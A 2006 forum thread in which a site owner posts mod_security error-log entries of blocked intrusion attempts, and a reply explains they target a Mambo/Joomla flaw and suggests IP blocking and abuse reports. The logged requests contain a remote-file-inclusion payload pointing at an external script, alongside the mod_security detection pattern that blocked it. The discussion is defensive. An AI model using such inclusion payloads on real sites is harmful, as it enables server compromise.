Please help with these attempted intrusions


#1

Is there anything I can do to stop these turds from trying to get into my machine? They seem to be failing, but they just won’t stop. Can I contact someone at the domain? On my domain, I’m listed as the abuse contact, so I don’t think it will help. Any suggestions?

More of the same here: http://benconley.net/errorlog.txt

[Sun Oct 8 12:14:17 2006] [error] [client 66.226.72.30] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at REQUEST_URI [severity “EMERGENCY”] [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?”]
[Sun Oct 8 23:12:29 2006] [error] [client 72.51.38.231] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at REQUEST_URI [severity “EMERGENCY”] [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?”]
[Sun Oct 8 23:12:30 2006] [error] [client 66.235.219.118] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at REQUEST_URI [severity “EMERGENCY”] [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?”]

http://benconley.net
http://teamshocker.com


#2

That’s a rough one, alright. You’d think they would quickly realize you are adequately “patched” and that Mambo/Joomla! exploit is not gonna work on your site, and then move on.

I suppose if they are all coming from the same IP address, or from just a few addresses, you could block the IP’s via .htaccess. Other than that I don’t know what to suggest. I’ve beem pretty lucky in that the few attempts of this nature that my sites have been exposed to were in shorts burst of activity, that then went away.

A look at whois for the site serving the exploit code show a couple of opportunities to screw with the guy - he is hosted by a California based Web host, and uses a gmail account. I think it quite likely that your error logs could get him booted for TOS/AUP abuse in each of those environments, if you want to go after him :wink: .

–rlparker